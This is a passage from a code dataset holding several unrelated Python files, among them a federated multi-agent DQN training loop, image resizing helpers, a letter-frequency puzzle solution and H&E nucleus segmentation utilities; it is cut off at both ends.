= math.ceil(args.evaluation_size / num_cores)\n # make sure each subprocess can finish all the game (end with done)\n with multiprocessing.Manager() as manager:\n train_history_aps = manager.list()\n\n process_list = []\n for _ in range(num_cores):\n process = multiprocessing.Process(target=run_game_once_parallel_random,\n args=(cp.deepcopy(env), train_history_aps, num_eps))\n process_list.append(process)\n\n for pro in process_list:\n pro.start()\n for pro in process_list:\n pro.join()\n pro.terminate()\n\n for res in train_history_aps:\n for index, memerys in enumerate(res):\n for state, a, alog, na, ga, av, rw, done in memerys:\n val_mem_aps[index].append(state, a, alog, na, ga, av, rw, done)\n\nif args.evaluate:\n for index in range(env.environment.ap_number):\n dqn[index].eval() # Set DQN (online network) to evaluation mode\n (avg_pack) = test(args, 0, dqn, val_mem_aps, matric, results_dir, evaluate=True) # Test\n for index in range(env.environment.ap_number):\n print('Avg. reward for ap' + str(index) + ': ' + str(avg_pack[0][index]) + ' | Avg. Q: ' + str(avg_pack[1][index]))\nelse:\n # Training loop\n T, aps_state, epsilon, done = 0, None, args.epsilon_max, env.reset()\n reinforce_ap = []\n for i in range(env.environment.ap_number):\n temp = []\n for j in range(3):\n temp.append([])\n reinforce_ap.append(temp)\n\n for T in trange(1, args.T_max + 1):\n if done and T > 2:\n done = env.reset()\n if T > 1 and args.data_reinforce:\n for index, ap_rein in enumerate(reinforce_ap):\n for ap_pair in ap_rein:\n for ap_ele in ap_pair:\n mem_aps[index].append(ap_ele[0], ap_ele[1], ap_ele[2], ap_ele[3],\n ap_ele[4], ap_ele[5], ap_ele[6], ap_ele[7])\n reinforce_ap = []\n for i in range(env.environment.ap_number):\n temp = []\n for j in range(3):\n temp.append([])\n reinforce_ap.append(temp)\n\n # training loop\n if T % args.replay_frequency == 0:\n for _ in range(env.environment.ap_number):\n dqn[_].reset_noise()\n\n state, action, action_logp, avail, reward, done, _ = env.step(dqn)\n epsilon = epsilon - args.epsilon_delta\n epsilon = np.clip(epsilon, a_min=args.epsilon_min, a_max=args.epsilon_max)\n\n for _ in range(env.environment.ap_number):\n if args.reward_clip > 0:\n reward[_] = torch.clamp(reward[_], max=args.reward_clip, min=-args.reward_clip) # Clip rewards\n neighbor_indice = env.environment.coop_graph.neighbor_indices(_, True)\n action_patch = np.append(action, [-1])\n mem_aps[_].append(state[_], action[_], action_logp[_], action_patch[neighbor_indice],\n action, avail[_], reward[_], done)\n dqn[_].update_neighbor_indice(neighbor_indice)\n # Append transition to memory\n if args.data_reinforce:\n # data reinforcement, not applicapable with infinite environment\n obs = state[_]\n obs = torch.rot90(obs, 2, [1, 2])\n if action[_] != 12 and not reward[_] == 0:\n reinforce_ap[_][0].append((obs, env.rot_action(action[_]), action_logp[_],\n env.rot_action(action_patch[neighbor_indice]),\n env.rot_action(action), env.rot_avail(avail[_]), reward[_], done))\n reinforce_ap[_][1].append((torch.flip(obs, [1]), env.flip_action(env.rot_action(action))[_],\n action_logp[_],\n env.flip_action(env.rot_action(action_patch[neighbor_indice])),\n env.flip_action(env.rot_action(action)),\n env.flip_avail(env.rot_avail(avail[_])), reward[_], done))\n reinforce_ap[_][2].append((torch.flip(state[_], [1]), env.flip_action(action)[_], action_logp[_],\n env.flip_action(action_patch[neighbor_indice]),\n env.flip_action(action), env.flip_avail(avail[_]), reward[_], done))\n # append rotated observation for data reinforcement\n\n if T >= args.learn_start:\n # tracker.print_diff()\n for index in range(env.environment.ap_number):\n mem_aps[index].priority_weight = min(mem_aps[index].priority_weight + priority_weight_increase, 1)\n # Anneal importance sampling weight β to 1\n\n if T % args.replay_frequency == 0:\n for index in range(env.environment.ap_number):\n dqn[index].learn(mem_aps[index]) # Train with n-step distributional double-Q learning\n\n if 0 < args.federated_round and T % args.federated_round == 0:\n global_weight = average_weights([model.get_state_dict() for model in dqn])\n global_target = average_weights([model.get_target_dict() for model in dqn])\n global_model.set_state_dict(global_weight)\n # global_model.set_target_dict(global_target)\n log('T = ' + str(T) + ' / ' + str(args.T_max) + ' Global averaging starts')\n average_reward = np.array([model.average_reward for model in dqn])\n average_reward = np.mean(average_reward)\n log('T = ' + str(T) + ' / ' + str(args.T_max) + ' Averaged reward is: ' + str(float(average_reward)))\n for models in dqn:\n models.set_state_dict(global_weight)\n # models.set_target_dict(global_target)\n models.average_reward = average_reward\n\n # If memory path provided, save it\n for index in range(env.environment.ap_number):\n if args.memory is not None:\n save_memory(mem_aps[index], args.memory, args.disable_bzip_memory, index)\n\n # Update target network\n # if T % args.target_update == 0: # uncomment for hard update\n for index in range(env.environment.ap_number):\n dqn[index].soft_update_target_net(1/args.target_update)\n\n # Checkpoint the network\n if (args.checkpoint_interval != 0) and (T % args.checkpoint_interval == 0):\n for index in range(env.environment.ap_number):\n dqn[index].save(results_dir, 'checkpoint' + str(index) + '.pth')\n\n if T % args.evaluation_interval == 0 and T >= args.learn_start:\n for index in range(env.environment.ap_number):\n dqn[index].eval() # Set DQN (online network) to evaluation mode\n\n if gp.PARALLEL_EXICUSION:\n aps_pack = test_p(args, T, dqn, val_mem_aps, metrics_all, matric, results_dir) # Test\n else:\n aps_pack = test(args, T, dqn, val_mem_aps, metrics_all, matric, results_dir) # Test\n\n log('T = ' + str(T) + ' / ' + str(aps_pack[3]) + ' Shapped Summed Reward.')\n if aps_pack[2]:\n log('T = ' + str(T) + ' / ' + str(args.T_max) + ' Better model, accepted.')\n global_model.save(results_dir, 'Global_')\n # for ind, mod in enumerate(dqn):\n # mod.save(results_dir, ind)\n else:\n log('T = ' + str(T) + ' / ' + str(args.T_max) + ' Worse model, reject.')\n for index in range(env.environment.ap_number):\n log('T = ' + str(T) + ' / ' + str(args.T_max) + ' For ap' + str(index) +\n ' | Avg. reward: ' + str(aps_pack[0][index]) + ' | Avg. Q: ' + str(aps_pack[1][index])\n + ' | Avg. R: ' + str(float(dqn[index].average_reward)))\n\n for index in range(env.environment.ap_number):\n dqn[index].train() # Set DQN (online network) back to training mode\n\nenv.close()\n","repo_name":"paperflight/Fed-MF-MAL","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":20641,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"}
+{"seq_id":"71377157448","text":"import pandas as pd\nfrom preprocessing import Preprocessor\n\ndf = pd.read_csv(\"../feature-engineering/all_mun_features/mun_features.csv\")\ndf = df.head(1000)\ndf = df[['mun_vehicles_rate', 'mun_motorcycles_rate']]\n\ntrain, test = train_test_split(df, test_size = 0.2)\n\np = Preprocessor(df)\np.df\np.scale_features_training(['mun_vehicles_rate', 'mun_motorcycles_rate'])\np.df\n\n","repo_name":"dssg/infonavit-public","sub_path":"pipeline_src/preprocessing_tests.py","file_name":"preprocessing_tests.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"43550371016","text":"import numpy as np\nimport cv2\n\n\ndef show_img(img, title='example'):\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR) # to cv2 bgr\n cv2.imshow(title, img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\ndef read_img(path) -> np.ndarray:\n img = cv2.imread(path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img\n\ndef letterbox_resize(img, size, show=False):\n '''resize image with unchanged aspect ratio using padding'''\n ih, iw = img.shape[:2]\n h, w = size\n if ih > iw :\n nh = h\n nw = int(h / ih * iw)\n elif ih < iw:\n nw = w\n nh = int(w / iw * ih)\n else:\n nh, nw = h, w\n # resize the image to small side is\n\n img_resize = cv2.resize(img, (nw, nh), interpolation=cv2.INTER_CUBIC)\n new_image = np.empty((size[0], size[1], 3), dtype=np.uint8)\n new_image[...] = (128, 128, 128)\n try:\n if ih < iw:\n new_image[(h - nh) // 2: (h - nh) // 2 + nh, (w - nw) // 2:] = img_resize\n elif ih > iw:\n new_image[(h - nh) // 2:, (w - nw) // 2:(w - nw) // 2 + nw, :] = img_resize\n else:\n new_image = img_resize\n\n\n except Exception as e:\n print(e)\n print(\"image shape:{}, resize shape: {}\".format(img.shape, (nh, nw)))\n\n if show:\n # print(new_image.shape)\n show_img(new_image)\n\n return new_image\n\ndef image_inference_preprocess(img, reshape_size):\n img = letterbox_resize(img, reshape_size, show=False)\n img = np.array(img, dtype=np.float32)\n img /= 255\n img = np.expand_dims(img, axis=0)\n return img\n","repo_name":"cshjarry/rc_net","sub_path":"utils/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"17807259411","text":"import sys\r\n\r\nstring = sys.stdin.readline().rstrip().lower()\r\nchar_dict = {}\r\nmax_char = []\r\n\r\nfor char in string:\r\n char_dict[char] = char_dict.get(char, 0) + 1\r\n \r\nM = max(char_dict.values())\r\n\r\nfor key, value in char_dict.items():\r\n if value == M:\r\n max_char.append(key)\r\n\r\nif len(max_char) == 1:\r\n print(max_char[0].upper())\r\nelse:\r\n print('?')","repo_name":"chae-yoon/algorithm","sub_path":"백준/Bronze/1157. 단어 공부/단어 공부.py","file_name":"단어 공부.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"32925538231","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 4 17:13:26 2022\n\n@author: user01\n\"\"\"\nimport cv2\nimport numpy as np\nfrom scipy import linalg\nimport numpy as np\nfrom scipy import ndimage as ndi\nimport tensorflow as tf\nfrom skimage import measure, morphology\nfrom scipy.ndimage import binary_fill_holes\nfrom skimage.segmentation import find_boundaries\nfrom gray2color import gray2color\nimport cv2\nimport copy\nfrom gray2color import gray2color\nimport matplotlib.pyplot as plt\n\n# Normalized optical density (OD) matrix M for H and E.\nrgb_from_her = np.array([[0.65, 0.70, 0.29], # H\n [0.07, 0.99, 0.11], # E\n [0.00, 0.00, 0.00]])# R\nrgb_from_her[2, :] = np.cross(rgb_from_her[0, :], rgb_from_her[1, :])\nher_from_rgb = linalg.inv(rgb_from_her)\n\n# lookup tables for bwmorph_thin\nG123_LUT = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1,\n 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0,\n 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0,\n 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1,\n 0, 0, 0], dtype=np.bool)\n\nG123P_LUT = np.array([0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0,\n 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0,\n 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0,\n 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1,\n 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0], dtype=np.bool)\n\ndef bwmorph_thin(image, n_iter=None):\n # check parameters\n if n_iter is None:\n n = -1\n elif n_iter <= 0:\n raise ValueError('n_iter must be > 0')\n else:\n n = n_iter\n \n # check that we have a 2d binary image, and convert it\n # to uint8\n skel = np.array(image).astype(np.uint8)\n \n if skel.ndim != 2:\n raise ValueError('2D array required')\n if not np.all(np.in1d(image.flat,(0,1))):\n raise ValueError('Image contains values other than 0 and 1')\n\n # neighborhood mask\n mask = np.array([[ 8, 4, 2],\n [16, 0, 1],\n [32, 64,128]],dtype=np.uint8)\n\n # iterate either 1) indefinitely or 2) up to iteration limit\n while n != 0:\n before = np.sum(skel) # count points before thinning\n \n # for each subiteration\n for lut in [G123_LUT, G123P_LUT]:\n # correlate image with neighborhood mask\n N = ndi.correlate(skel, mask, mode='constant')\n # take deletion decision from this subiteration's LUT\n D = np.take(lut, N)\n # perform deletion\n skel[D] = 0\n \n after = np.sum(skel) # coint points after thinning\n \n if before == after: \n # iteration had no effect: finish\n break\n \n # count down to iteration limit (or endlessly negative)\n n -= 1\n skel = skel.astype(np.bool)\n return skel.astype(np.uint8)\n\ndef deconv_stains(rgb, conv_matrix):\n '''\n Parameters\n ----------\n rgb: a 3-channel RGB iamge with channel dim at axis=-1 e.g. (W,H,3) type: uint8/float32\n conv_matrix: Deconvolution matrix D of shape (3,3); type: float32\n Returns\n -------\n image with doconvolved stains, same dimension as input.\n '''\n # change datatype to float64\n rgb = (rgb).astype(np.float64)\n np.maximum(rgb, 1E-6, out=rgb) # to avoid log artifacts\n log_adjust = np.log(1E-6) # for compensate the sum above\n x = np.log(rgb)\n stains = (x / log_adjust) @ conv_matrix\n\n # normalizing and shifting the data distribution to proper pixel values range (i.e., [0,255])\n h = 1 - (stains[:,:,0]-np.min(stains[:,:,0]))/(np.max(stains[:,:,0])-np.min(stains[:,:,0]))\n e = 1 - (stains[:,:,1]-np.min(stains[:,:,1]))/(np.max(stains[:,:,1])-np.min(stains[:,:,1]))\n r = 1 - (stains[:,:,2]-np.min(stains[:,:,2]))/(np.max(stains[:,:,2])-np.min(stains[:,:,2]))\n\n her = cv2.merge((h,e,r)) * 255\n\n return her.astype(np.uint8)\n\ndef enclose_boundry(sem_mask, instances):\n frame = np.ones(sem_mask.shape)\n frame[2:-2,2:-2] = 0\n # for nuclie who are touching the image boudry\n inst_b = np.multiply(frame, sem_mask)\n inst_b = np.add(instances, inst_b)\n _,inst_b = cv2.threshold(inst_b, 0, 1, cv2.THRESH_BINARY)\n inst_b = inst_b.astype(np.uint8)\n return inst_b\ndef read_img(img_path, modelip_img_w, modelip_img_h):\n \n img = cv2.imread(img_path, -1) \n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n \n h = deconv_stains(img, her_from_rgb)\n \n img = cv2.resize(img, (modelip_img_w, modelip_img_h), interpolation=cv2.INTER_LINEAR) \n h = cv2.resize(h, (modelip_img_w, modelip_img_h), interpolation=cv2.INTER_LINEAR) \n \n return img, h\n \ndef Tumor_IO(img_path, sem_mask, inst_mask, modelip_img_w, modelip_img_h):\n '''\n See desdcription of Depth_Data_Generator\n '''\n img = cv2.imread(img_path, -1) \n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n #h = decovn_he(img)\n h = deconv_stains(img, her_from_rgb)\n\n sem = cv2.imread(sem_mask, -1)\n inst = cv2.imread(inst_mask, -1)\n if len(np.unique(sem)) == 1:# b/c only BG is present\n sem = sem * 0\n inst = inst * 0\n # b/c the overlayed boundries might contain pixel value > 1\n _,inst = cv2.threshold(inst, 0, 1, cv2.THRESH_BINARY)\n \n # verify boundries enclosement\n # still we need to enclose boundry to be consistent in test and train time\n inst = enclose_boundry(sem, inst)\n \n if img.shape[0] != modelip_img_w:\n img = cv2.resize(img, (modelip_img_w, modelip_img_h), interpolation=cv2.INTER_LINEAR) \n h = cv2.resize(h, (modelip_img_w, modelip_img_h), interpolation=cv2.INTER_LINEAR) \n \n # to normalize [0, 255] pixel values to [0, 1]\n # if you are using builtin keras model then dont normalize\n img = img\n h = h \n inst = inst[:,:, np.newaxis]\n sem = sem[:,:, np.newaxis]\n \n return img, sem, inst, h\n\ndef gray2encoded(y_true, num_class):\n '''\n Parameters\n ----------\n y_true : 2D array of shape [H x W] containing unique pixel values for all N classes i.e., [0, 1, ..., N] \n num_class : int no. of classes inculding BG\n Returns\n -------\n encoded_op : one-hot encoded 3D array of shape [H W N] where N=num_class\n\n '''\n num_class = num_class\n \n y_true = tf.cast(y_true, 'int32')\n \n encoded_op = tf.one_hot(y_true, num_class, axis = -1)\n \n if tf.executing_eagerly()==False:\n sess1 = tf.compat.v1.Session()\n encoded_op = sess1.run(encoded_op)\n else: \n encoded_op = encoded_op.numpy()\n return encoded_op\n\ndef seprate_instances(sem_mask, instance_boundaries, num_classes, apply_morph=True, kernel_size=3):\n '''\n\n Parameters\n ----------\n sem_mask : 2D array of shape [H x W] containing unique pixel values for all N classes i.e., [0, 1, ..., N]\n instance_boundaries : 2D array of shape [H x W] bounderies for all N classes i.e., [0->BG, 1->boundry]\n num_classes : no of classes in the sem mask including BG an int\n apply_morph : apply morphological operator so that the edges which were chipped of will be recovered\n Returns\n kernel_size : int kernel size to apply morphological operations (3 default b/c gives best results)\n -------\n op : 3D array containing seperated instances in each channel shape [H x W x N]\n\n '''\n \n # change datatypt to perform operation\n instances = instance_boundaries.astype(np.float16)\n sem_mask = sem_mask.astype(np.float16)\n instances2 = instances * 6 # bc largest value in sem mask is 5\n \n t = np.subtract(sem_mask, instances2)\n negative_remover = lambda a: (np.abs(a)+a)/2 # one line funstion created by lamda 1 input and 1 output\n t = negative_remover(t).astype(np.uint8)\n # or you can use following line\n #t = np.where(t > 0, t, 0).astype(np.uint8)\n \n # Now as in PanNuke dataset the BG was in 5ht channel and during preprocessing we shifted it to \n # 0th channel. Now going back so that 0th channel is Neoplastic class and 5th channel is BG as given \n # in original data description.\n \n if len(np.unique(cv2.fastNlMeansDenoising(t))) == 1:# 1st denoising there might be some noise in the op image\n # if only BG is present than only last channel will be one, do it here\n # b/c the np where conditions wont have any effect on the array if it \n # only have one class\n tt = np.zeros((t.shape[0], t.shape[1], num_classes))\n tt[:,:,5] = tt[:,:,-1] + 1\n t = tt\n else:# if have atleast one nuclie present/ swaping channels again to match GT\n t = np.where(t == 5, 6, t)\n t = np.where(t == 0, 5, t)\n t = np.where(t == 6, 0, t)\n \n t = gray2encoded(t, num_classes)\n \n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(kernel_size,kernel_size))# before i started main_203 it was 2x2\n op = np.zeros(t.shape)\n for i in range(num_classes):\n # Bc at some place boundry is diagonal and very thin (1px) so measure-label\n # will join two seprate blobs so this will seprate them a little\n t[:,:,i] = cv2.erode(t[:,:,i],kernel,iterations = 1)\n # b/c now 5th channel is BG; still 0 digit represents BG in all channels\n # in 5th channel also the BG of the BG*\n op[:,:,i] = measure.label(t[:,:,i], connectivity=2, background=0)# 2 is ususal\n \n if apply_morph == True:\n #kernel = cv2.getStructuringElement(cv2.MORPH_CROSS,(10,10))\n #kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (kernel_size, kernel_size))\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (kernel_size, kernel_size))\n for i in range(num_classes-1):# bc last channel has BG we dont want to change that \n op[:,:,i] = cv2.dilate(op[:,:,i],kernel,iterations = 1)\n \n op[:,:,5] = np.where(op[:,:,5]>1, 1, op[:,:,5])\n \n return op\n\n\n\n\ndef remove_small_obj_n_holes(seg_op, min_area=10, kernel_size=3):\n '''\n Parameters\n ----------\n seg_op : a 4D array of N channels [1 H W N] where N is number of classses\n min_area : The smallest allowable object size.\n kernel_size : int kernel size to apply morphological operations (3 default b/c gives best results)\n Returns\n -------\n a : 4D array of N channels [1 H W N] with noise removed and holes filled\n '''\n seg_op = copy.deepcopy(seg_op).astype(np.uint8)\n #k = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(kernel_size,kernel_size))\n k = cv2.getStructuringElement(cv2.MORPH_RECT, (kernel_size, kernel_size))\n a = seg_op.squeeze()\n for i in range(a.shape[-1]-1): # iterate over each class seprately\n # need to convert array into boolen type\n b = morphology.remove_small_objects(a[:,:,i+1].astype(bool), min_size=min_area).astype(np.uint8)\n b = cv2.morphologyEx(b, cv2.MORPH_CLOSE, k)\n a[:,:,i+1] = b\n #a[:,:,i+1] = morphology.convex_hull_object(b, connectivity=2)\n #a[:,:,i+1] = binary_fill_holes(b).astype(int)\n a = a[np.newaxis,:,:,:]# keep IO size consistant\n \n return a\n\ndef assgin_via_majority(seg):\n '''\n Parameters\n ----------\n seg : 2D array containing unique pixel values for each class\n Returns\n -------\n x: 2D array where an instance is assigned to be the class of most frequently\n occuring pixel value (as each unique pixel value represent a class).\n '''\n a = copy.deepcopy(seg).astype(np.uint8)\n # 1st convert to binary mask\n _, th = cv2.threshold(a, 0, 1, cv2.THRESH_BINARY)\n # now measure label\n b = measure.label(th, connectivity=2, background=0)\n # now make n unique channels n= no. of labels measured\n c = gray2encoded(b, len(np.unique(b)))\n \n op = np.zeros(c.shape)\n for i in range(len(np.unique(b))-1):\n temp = np.multiply(c[:,:,i+1], a)# multiply each channel element wise\n mfp = most_frequent_pixel(temp)\n # now convert the range form [0, 1] to [0, mfp]\n _, temp = cv2.threshold(temp, 0, mfp, cv2.THRESH_BINARY)\n op[:,:,i+1] = temp\n x = np.sum(op, axis=2)\n \n return x.astype(np.uint8)\n\ndef most_frequent_pixel(img):\n '''\n Parameters\n ----------\n img : 2D array containing unique pixel values for each class\n Returns\n -------\n op : int, most frequently occuring pixel value excluding which has pixel value of 0\n '''\n unq, count = np.unique(img, return_counts=True)\n idx = np.where(count == np.max(count[1:]))\n op = int(unq[idx][0])\n \n return op\n\ndef decode_predictions(seg_op, inst_op, thresh=0.5):\n '''\n Parameters\n ----------\n seg_op : Raw logits from CNN output, shape [B, H, W, N]\n inst_op : Raw logits from CNN output, shape [B, H, W, 1]\n thresh : Threshold on pixel confidence a float between [0, 1]\n Returns\n -------\n seg_op : activated and thresholded output of CNN\n inst_op : activated and thresholded output of CNN\n '''\n seg_op = softmax_activation(seg_op)\n seg_op = (seg_op > thresh).astype(np.uint8)\n seg_op = remove_small_obj_n_holes(seg_op, min_area=22, kernel_size=3)\n seg_op = np.argmax(seg_op[0,:,:,:], 2).astype(np.uint8)\n seg_op = assgin_via_majority(seg_op) # assigning instance via majority pixels ((post processing))\n seg_op = (seg_op).astype(np.uint8)\n \n inst_op = sigmoid_activation(inst_op)\n inst_op = (inst_op > thresh).astype(np.uint8)\n inst_op = inst_op.squeeze()\n inst_op = (inst_op).astype(np.uint8)\n inst_op = bwmorph_thin(inst_op)\n \n return seg_op, inst_op\n\ndef get_inst_seg(sep_inst, img, blend=True):\n '''\n Parameters\n ----------\n sep_inst : a 3D array of shape [H, W, N] where N is number of classes and in\n each channel all the instances have a unique value.\n img : Original RGB image for overlaying the instance seg results\n blend: wether to project the inst mask over the RGB original image or not\n Returns\n -------\n blend : a 3D array in RGB format [H W 3] in which each instance have of each\n and all classes have a unique RGB value \n 1. overalyed over original image if; blend=True\n 2. Raw mask if; blend=False\n ''' \n img = cv2.resize(img, (sep_inst.shape[0], sep_inst.shape[1]), interpolation=cv2.INTER_LINEAR) \n sep_inst = measure.label(sep_inst[:,:,0:5], connectivity=2, background=0) # ignore BG channel i.e. 6th ch.\n # take element wise sum of all channels so that each instance of each class\n # has a unique value in whole 3D array.\n sep_inst = np.sum(sep_inst, axis=-1) \n rgb = gray2color(sep_inst.astype(np.uint8), use_pallet='ade20k')\n if blend:\n inv = 1 - cv2.threshold(sep_inst.astype(np.uint8), 0, 1, cv2.THRESH_BINARY)[1]\n inv = cv2.merge((inv, inv, inv))\n blend = np.multiply(img, inv)\n blend = np.add(blend, rgb)\n else:\n blend = rgb\n \n return blend\n\ndef get_inst_seg_bdr(sep_inst, img, blend=True):\n '''\n Parameters\n ----------\n sep_inst : a 3D array of shape [H, W, N] where N is number of classes and in\n each channel all the instances have a unique value.\n img : Original RGB image for overlaying the instance seg results\n blend: wether to project the inst mask over the RGB original image or not\n Returns\n -------\n blend : a 3D array in RGB format [H W 3] in which each instance have of each\n and all classes have a unique RGB border. \n 1. overalyed over original image if; blend=True\n 2. Raw mask if; blend=False\n ''' \n img = cv2.resize(img, (sep_inst.shape[0], sep_inst.shape[1]), interpolation=cv2.INTER_LINEAR) \n sep_inst = measure.label(sep_inst[:,:,0:5], connectivity=2, background=0)# ignore BG channel i.e. 6th ch.\n # take element wise sum of all channels so that each instance of each class\n # has a unique value in whole 3D array.\n sep_inst = np.sum(sep_inst, axis=-1)\n # isolate all instances \n sep_inst_enc = gray2encoded(sep_inst, num_class=len(np.unique(sep_inst)))\n # as the in encoded output the 0th channel will be BG we don't need it so\n sep_inst_enc = sep_inst_enc[:,:,1:]\n # get boundaries of thest isolated instances\n temp = np.zeros(sep_inst_enc.shape)\n for i in range(sep_inst_enc.shape[2]):\n temp[:,:,i] = find_boundaries(sep_inst_enc[:,:,i], connectivity=1, mode='thick', background=0)\n \n # bc argmax will make the inst at 0 ch zeros so add a dummy channel\n dummy = np.zeros((temp.shape[0], temp.shape[1], 1))\n temp = np.concatenate((dummy, temp), axis=-1)\n \n sep_inst_bdr = np.argmax(temp, axis=-1)\n sep_inst_bdr_rgb = gray2color(sep_inst_bdr.astype(np.uint8), use_pallet='ade20k')\n if blend:\n inv = 1 - cv2.threshold(sep_inst_bdr.astype(np.uint8), 0, 1, cv2.THRESH_BINARY)[1]\n inv = cv2.merge((inv, inv, inv))\n blend = np.multiply(img, inv)\n blend = np.add(blend, sep_inst_bdr_rgb)\n else:\n blend = sep_inst_bdr_rgb\n \n return blend\n\ndef get_sem(sem, img, blend=True):\n '''\n Parameters\n ----------\n sem : a 2D array of shape [H, W] where containing unique value for each class.\n img : Original RGB image for overlaying the semantic seg results\n blend: wether to project the inst mask over the RGB original image or not\n Returns\n -------\n blend : a 3D array in RGB format [H W 3] in which each class have a unique RGB color. \n 1. overalyed over original image if; blend=True\n 2. Raw mask if; blend=False\n ''' \n img = cv2.resize(img, (sem.shape[0], sem.shape[1]), interpolation=cv2.INTER_LINEAR) \n seg = gray2color(sem.astype(np.uint8), use_pallet='pannuke')\n \n if blend:\n inv = 1 - cv2.threshold(sem.astype(np.uint8), 0, 1, cv2.THRESH_BINARY)[1]\n inv = cv2.merge((inv, inv, inv))\n blend = np.multiply(img, inv)\n blend = np.add(blend, seg)\n else:\n blend = seg\n \n return blend\n\ndef get_sem_bdr(sem, img, blend=True):\n '''\n Parameters\n ----------\n sem : a 2D array of shape [H, W] where containing unique value for each class.\n img : Original RGB image for overlaying the semantic seg results\n blend: wether to project the inst mask over the RGB original image or not\n Returns\n -------\n blend : a 3D array in RGB format [H W 3] in which each class have a unique RGB border. \n 1. overalyed over original image if; blend=True\n 2. Raw mask if; blend=False\n ''' \n img = cv2.resize(img, (sem.shape[0], sem.shape[1]), interpolation=cv2.INTER_LINEAR) \n # 1-hot encode all classes \n sem_enc = gray2encoded(sem, num_class=6)\n # as the in encoded output the 0th channel will be BG we don't need it so\n sem_enc = sem_enc[:,:,1:]\n # get boundaries of thest isolated instances\n temp = np.zeros(sem_enc.shape)\n for i in range(sem_enc.shape[2]):\n temp[:,:,i] = find_boundaries(sem_enc[:,:,i], connectivity=1, mode='thick', background=0)\n \n dummy = np.zeros((temp.shape[0], temp.shape[1], 1))\n temp = np.concatenate((dummy, temp), axis=-1)\n \n sem_bdr = np.argmax(temp, axis=-1)\n sem_bdr_rgb = gray2color(sem_bdr.astype(np.uint8), use_pallet='pannuke')\n if blend:\n inv = 1 - cv2.threshold(sem_bdr.astype(np.uint8), 0, 1, cv2.THRESH_BINARY)[1]\n inv = cv2.merge((inv, inv, inv))\n blend = np.multiply(img, inv)\n blend = np.add(blend, sem_bdr_rgb)\n else:\n blend = sem_bdr_rgb\n return blend\n\ndef my_argmax(tensor):\n '''\n Fixes the zero channel problem i.e. the class predicted at 0th channel \n wont go to 0 as it does with usual np.argmax\n Parameters\n ----------\n pred_tensor : 3D/4D array of shape [B, H, W, N] or [H, W, N]\n Returns\n -------\n argmaxed output of shape [B, H, W] or [H, W]]\n '''\n pred_tensor = np.copy(tensor)\n j = 0\n for i in range(pred_tensor.shape[-1]):\n j 